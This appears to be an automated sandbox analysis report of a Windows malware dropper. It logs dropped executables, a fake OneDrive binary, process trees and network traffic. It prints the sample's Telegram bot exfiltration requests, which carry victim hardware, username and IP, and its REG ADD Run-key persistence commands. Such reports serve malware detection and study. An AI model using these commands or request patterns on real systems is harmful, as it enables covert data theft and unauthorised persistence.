Source: C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe |
Virustotal: Detection: 39% |
Perma Link |
Source: C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe |
ReversingLabs: Detection: 14% |
Source: 68e7a0fa9f7dbbb34bc4bad97690ea72.exe |
Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED |
Source: 68e7a0fa9f7dbbb34bc4bad97690ea72.exe |
Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT |
Source: C:\Users\user\Desktop\68e7a0fa9f7dbbb34bc4bad97690ea72.exe |
Code function: 0_2_0040646B FindFirstFileA,FindClose, |
0_2_0040646B |
Source: C:\Users\user\Desktop\68e7a0fa9f7dbbb34bc4bad97690ea72.exe |
Code function: 0_2_004027A1 FindFirstFileA, |
0_2_004027A1 |
Source: C:\Users\user\Desktop\68e7a0fa9f7dbbb34bc4bad97690ea72.exe |
Code function: 0_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, |
0_2_004058BF |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Code function: 11_2_00406F00 FindFirstFileA, |
11_2_00406F00 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Code function: 11_2_004364E3 FindFirstFileExW, |
11_2_004364E3 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
DNS query: name: ipinfo.io |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
DNS query: name: ipinfo.io |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
DNS query: name: ip-api.com |
Source: global traffic |
HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 04 May 2022 09:04:58 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection |
Source: [New]1.exe.0.dr, [New]Salvity_crypted(2).exe.0.dr |
String found in binary or memory: http://aia.entrust.net/ts1-chain256.cer01 |
Source: AppLaunch.exe, 0000000B.00000002.455822807.0000000000E4D000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 0000000B.00000003.454692399.0000000000E4D000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://api.telegram.org/botTELEG |
Source: AppLaunch.exe, 0000000B.00000002.456337506.0000000006C12000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://api.telegram.org/botTELEGRAM_APIKEY/sendMessage?chat_id=TELEGRAM_CHATID&text=%F0%9F%98%8E%20N |
Source: [New]1.exe.0.dr, [New]Salvity_crypted(2).exe.0.dr |
String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0 |
Source: [New]1.exe.0.dr, [New]Salvity_crypted(2).exe.0.dr |
String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0 |
Source: [New]1.exe.0.dr, [New]Salvity_crypted(2).exe.0.dr |
String found in binary or memory: http://crl.entrust.net/2048ca.crl0 |
Source: [New]1.exe.0.dr, [New]Salvity_crypted(2).exe.0.dr |
String found in binary or memory: http://crl.entrust.net/ts1ca.crl0 |
Source: AppLaunch.exe, 0000000B.00000003.454466555.0000000000E68000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 0000000B.00000002.455882630.0000000000E68000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.globalsign.net/root-r2.crl0 |
Source: [New]1.exe.0.dr, [New]Salvity_crypted(2).exe.0.dr |
String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O |
Source: [New]1.exe.0.dr, [New]Salvity_crypted(2).exe.0.dr |
String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05 |
Source: [New]1.exe.0.dr, [New]Salvity_crypted(2).exe.0.dr |
String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0: |
Source: [New]1.exe.0.dr, [New]Salvity_crypted(2).exe.0.dr |
String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K |
Source: AppLaunch.exe, 00000019.00000002.797439121.0000000006A79000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000019.00000002.797490031.0000000006A8A000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://ip-api.com |
Source: AppLaunch.exe, 00000019.00000002.797439121.0000000006A79000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://ip-api.com/line/?fields=hosting |
Source: AppLaunch.exe, 00000019.00000002.797439121.0000000006A79000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://ip-api.com4bkX |
Source: AppLaunch.exe, 0000000B.00000002.456230576.0000000006BD0000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://ipinfo.io/json |
Source: AppLaunch.exe, 0000000B.00000002.456230576.0000000006BD0000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://ipinfo.io/json4 |
Source: AppLaunch.exe, 0000000B.00000002.456230576.0000000006BD0000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://ipinfo.io/jsonHt |
Source: AppLaunch.exe, 0000000B.00000002.456230576.0000000006BD0000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://ipinfo.io/jsonxt |
Source: 68e7a0fa9f7dbbb34bc4bad97690ea72.exe |
String found in binary or memory: http://nsis.sf.net/NSIS_Error |
Source: 68e7a0fa9f7dbbb34bc4bad97690ea72.exe |
String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError |
Source: [New]1.exe.0.dr, [New]Salvity_crypted(2).exe.0.dr |
String found in binary or memory: http://ocsp.digicert.com0C |
Source: [New]1.exe.0.dr, [New]Salvity_crypted(2).exe.0.dr |
String found in binary or memory: http://ocsp.digicert.com0N |
Source: [New]1.exe.0.dr, [New]Salvity_crypted(2).exe.0.dr |
String found in binary or memory: http://ocsp.entrust.net02 |
Source: [New]1.exe.0.dr, [New]Salvity_crypted(2).exe.0.dr |
String found in binary or memory: http://ocsp.entrust.net03 |
Source: AppLaunch.exe, 00000019.00000002.797439121.0000000006A79000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: [New]1.exe.0.dr, [New]Salvity_crypted(2).exe.0.dr |
String found in binary or memory: http://www.digicert.com/CPS0 |
Source: [New]1.exe.0.dr, [New]Salvity_crypted(2).exe.0.dr |
String found in binary or memory: http://www.entrust.net/rpa0 |
Source: [New]1.exe.0.dr, [New]Salvity_crypted(2).exe.0.dr |
String found in binary or memory: http://www.entrust.net/rpa03 |
Source: AppLaunch.exe, 0000000B.00000002.456230576.0000000006BD0000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://api.telegram.org/ |
Source: AppLaunch.exe, 0000000B.00000002.456230576.0000000006BD0000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000B.00000003.454466555.0000000000E68000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 0000000B.00000002.455882630.0000000000E68000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 0000000B.00000002.455822807.0000000000E4D000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 0000000B.00000003.454692399.0000000000E4D000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://api.telegram.org/botTELEGRAM_APIKEY/sendMessage?chat_id=TELEGRAM_CHATID&text=%F0%9F%98%8E%20 |
Source: AppLaunch.exe, 0000000B.00000002.456337506.0000000006C12000.00000004.00000800.00020000.00000000.sdmp, json[1].json.11.dr |
String found in binary or memory: https://ipinfo.io/missingauth |
Source: [New]1.exe.0.dr, [New]Salvity_crypted(2).exe.0.dr |
String found in binary or memory: https://www.digicert.com/CPS0 |
Source: global traffic |
HTTP traffic detected: GET /botTELEGRAM_APIKEY/sendMessage?chat_id=TELEGRAM_CHATID&text=%F0%9F%98%8E%20New%20worker%20connected!%0A%0A%E2%9D%97%EF%B8%8F%20Info:%20%0A%E2%80%94%20GPU:%20Microsoft%20Basic%20Display%20Adapter%0A%E2%80%94%20CPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0A%E2%80%94%20RAM:%208191%20MB%0A%0A%E2%9D%95%20Other%20info:%0A%E2%80%94%20Username:%20user%0A%E2%80%94%20IP:%20102.129.143.40%0A%E2%80%94%20Country:%20CH%0A%E2%80%94%20Build%20tag:%20BOba%0A HTTP/1.1Accept: text/*User-Agent: softHost: api.telegram.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /json HTTP/1.1Accept: text/*User-Agent: softHost: ipinfo.io |
Source: global traffic |
HTTP traffic detected: GET /botTELEGRAM_APIKEY/sendMessage?chat_id=TELEGRAM_CHATID&text=%F0%9F%98%8E%20New%20worker%20connected!%0A%0A%E2%9D%97%EF%B8%8F%20Info:%20%0A%E2%80%94%20GPU:%20Microsoft%20Basic%20Display%20Adapter%0A%E2%80%94%20CPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0A%E2%80%94%20RAM:%208191%20MB%0A%0A%E2%9D%95%20Other%20info:%0A%E2%80%94%20Username:%20user%0A%E2%80%94%20IP:%20102.129.143.40%0A%E2%80%94%20Country:%20CH%0A%E2%80%94%20Build%20tag:%20BOba%0A HTTP/1.1Accept: text/*User-Agent: softHost: api.telegram.org |
Source: global traffic |
HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive |
Source: [New]1.exe, 00000009.00000002.428693209.0000000000FDA000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/> |
|
Source: C:\Users\user\Desktop\68e7a0fa9f7dbbb34bc4bad97690ea72.exe |
Code function: 0_2_0040535C GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard, |
0_2_0040535C |
Source: 68e7a0fa9f7dbbb34bc4bad97690ea72.exe |
Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED |
Source: C:\Users\user\Desktop\68e7a0fa9f7dbbb34bc4bad97690ea72.exe |
Code function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, |
0_2_00403348 |
Source: C:\Users\user\Desktop\68e7a0fa9f7dbbb34bc4bad97690ea72.exe |
Code function: 0_2_00406945 |
0_2_00406945 |
Source: C:\Users\user\Desktop\68e7a0fa9f7dbbb34bc4bad97690ea72.exe |
Code function: 0_2_0040711C |
0_2_0040711C |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Code function: 11_2_00401000 |
11_2_00401000 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Code function: 11_2_004031B0 |
11_2_004031B0 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Code function: 11_2_0042F090 |
11_2_0042F090 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Code function: 11_2_0042F2C2 |
11_2_0042F2C2 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Code function: 11_2_0042C500 |
11_2_0042C500 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Code function: 11_2_0042F51F |
11_2_0042F51F |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Code function: 11_2_0042A59B |
11_2_0042A59B |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Code function: 11_2_0043E70F |
11_2_0043E70F |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Code function: 11_2_0043585E |
11_2_0043585E |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Code function: 11_2_0043597E |
11_2_0043597E |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Code function: 11_2_00427990 |
11_2_00427990 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Code function: 11_2_00439F59 |
11_2_00439F59 |
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe |
Code function: 21_2_00A138DD |
21_2_00A138DD |
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe |
Code function: 21_2_009FF3D3 |
21_2_009FF3D3 |
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe |
Code function: 21_2_00A023D0 |
21_2_00A023D0 |
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe |
Code function: 21_2_00A11C9A |
21_2_00A11C9A |
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe |
Code function: 21_2_00A0858C |
21_2_00A0858C |
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe |
Code function: 21_2_009FF605 |
21_2_009FF605 |
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe |
Code function: 21_2_00A137BD |
21_2_00A137BD |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Code function: 25_2_011CC370 |
25_2_011CC370 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Code function: 25_2_011CE2D0 |
25_2_011CE2D0 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Code function: 25_2_011C1479 |
25_2_011C1479 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Code function: 25_2_011C0858 |
25_2_011C0858 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Code function: 25_2_011C0B30 |
25_2_011C0B30 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Code function: 25_2_011C1D71 |
25_2_011C1D71 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Code function: 25_2_011CCC40 |
25_2_011CCC40 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Code function: 25_2_011CC028 |
25_2_011CC028 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Code function: 25_2_011C20A8 |
25_2_011C20A8 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Code function: 25_2_011C10A9 |
25_2_011C10A9 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Code function: 25_2_011C1570 |
25_2_011C1570 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Code function: 25_2_011C0B20 |
25_2_011C0B20 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Code function: 25_2_011C0B6A |
25_2_011C0B6A |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Code function: 25_2_011C1E21 |
25_2_011C1E21 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Code function: 25_2_09567530 |
25_2_09567530 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Code function: 25_2_09567520 |
25_2_09567520 |
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe |
Code function: String function: 009FAE40 appears 33 times |
|
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Code function: String function: 00425540 appears 41 times |
|
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Code function: String function: 00430E17 appears 167 times |
|
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v OneDrive /t REG_SZ /f /d C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe |
Source: 68e7a0fa9f7dbbb34bc4bad97690ea72.exe |
Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ |
Source: unknown |
Process created: C:\Users\user\Desktop\68e7a0fa9f7dbbb34bc4bad97690ea72.exe "C:\Users\user\Desktop\68e7a0fa9f7dbbb34bc4bad97690ea72.exe" |
|
Source: C:\Users\user\Desktop\68e7a0fa9f7dbbb34bc4bad97690ea72.exe |
Process created: C:\Users\user\AppData\Roaming\[New]1.exe C:\Users\user\AppData\Roaming\[New]1.exe |
|
Source: C:\Users\user\AppData\Roaming\[New]1.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Users\user\AppData\Roaming\[New]1.exe |
Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
|
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v OneDrive /t REG_SZ /f /d C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe |
|
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v OneDrive /t REG_BINARY /f /d 020000000000000000000000 |
|
Source: C:\Windows\SysWOW64\reg.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\SysWOW64\reg.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Users\user\Desktop\68e7a0fa9f7dbbb34bc4bad97690ea72.exe |
Process created: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe |
|
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe |
Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
|
Source: C:\Users\user\Desktop\68e7a0fa9f7dbbb34bc4bad97690ea72.exe |
Process created: C:\Users\user\AppData\Roaming\[New]1.exe C:\Users\user\AppData\Roaming\[New]1.exe |
Jump to behavior |
Source: C:\Users\user\Desktop\68e7a0fa9f7dbbb34bc4bad97690ea72.exe |
Process created: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe |
Jump to behavior |
Source: C:\Users\user\AppData\Roaming\[New]1.exe |
Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v OneDrive /t REG_SZ /f /d C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v OneDrive /t REG_BINARY /f /d 020000000000000000000000 |
Jump to behavior |
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe |
Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Jump to behavior |
Source: C:\Users\user\Desktop\68e7a0fa9f7dbbb34bc4bad97690ea72.exe |
Code function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, |
0_2_00403348 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor |
Source: C:\Users\user\Desktop\68e7a0fa9f7dbbb34bc4bad97690ea72.exe |
Code function: 0_2_0040460D GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA, |
0_2_0040460D |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5596:120:WilError_01 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Mutant created: \Sessions\1\BaseNamedObjects\9D16FBEF0D8A8F87529DE06A1C43C737 |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4856:120:WilError_01 |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6064:120:WilError_01 |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4208:120:WilError_01 |
Source: 21.3.[New]Salvity_crypted(2).exe.2570000.0.unpack, u0002u2002.cs |
Cryptographic APIs: 'CreateDecryptor' |
Source: 25.2.AppLaunch.exe.400000.0.unpack, u0002u2002.cs |
Cryptographic APIs: 'CreateDecryptor' |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
File read: C:\Windows\System32\drivers\etc\hosts |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
File read: C:\Windows\System32\drivers\etc\hosts |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
File read: C:\Windows\System32\drivers\etc\hosts |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
File read: C:\Windows\System32\drivers\etc\hosts |
Jump to behavior |
Source: 68e7a0fa9f7dbbb34bc4bad97690ea72.exe |
Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT |
Source: [New]1.exe.0.dr |
Static PE information: section name: crL2t |
Source: [New]1.exe.0.dr |
Static PE information: section name: 0wrVPjE |
Source: [New]1.exe.0.dr |
Static PE information: section name: YW7wta |
Source: [New]1.exe.0.dr |
Static PE information: section name: obFJa |
Source: [New]1.exe.0.dr |
Static PE information: section name: e5WJl% |
Source: [New]1.exe.0.dr |
Static PE information: section name: 9RdLoc |
Source: [New]1.exe.0.dr |
Static PE information: section name: Lnxjc |
Source: [New]Salvity_crypted(2).exe.0.dr |
Static PE information: section name: CwRJt |
Source: [New]Salvity_crypted(2).exe.0.dr |
Static PE information: section name: V1Huayq |
Source: [New]Salvity_crypted(2).exe.0.dr |
Static PE information: section name: 3gNuta |
Source: [New]Salvity_crypted(2).exe.0.dr |
Static PE information: section name: qi7ga |
Source: [New]Salvity_crypted(2).exe.0.dr |
Static PE information: section name: p4YOu8 |
Source: [New]Salvity_crypted(2).exe.0.dr |
Static PE information: section name: jnlhoc |
Source: [New]Salvity_crypted(2).exe.0.dr |
Static PE information: section name: tM59c |
Source: OneDrive.exe.11.dr |
Static PE information: section name: _RDATA |
Source: C:\Users\user\Desktop\68e7a0fa9f7dbbb34bc4bad97690ea72.exe |
File created: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe |
Jump to dropped file |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe |
Jump to dropped file |
Source: C:\Users\user\Desktop\68e7a0fa9f7dbbb34bc4bad97690ea72.exe |
File created: C:\Users\user\AppData\Roaming\[New]1.exe |
Jump to dropped file |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\Secur32.dll |
Jump to dropped file |
Source: C:\Users\user\Desktop\68e7a0fa9f7dbbb34bc4bad97690ea72.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Process information set: NOOPENFILEERRORBOX |
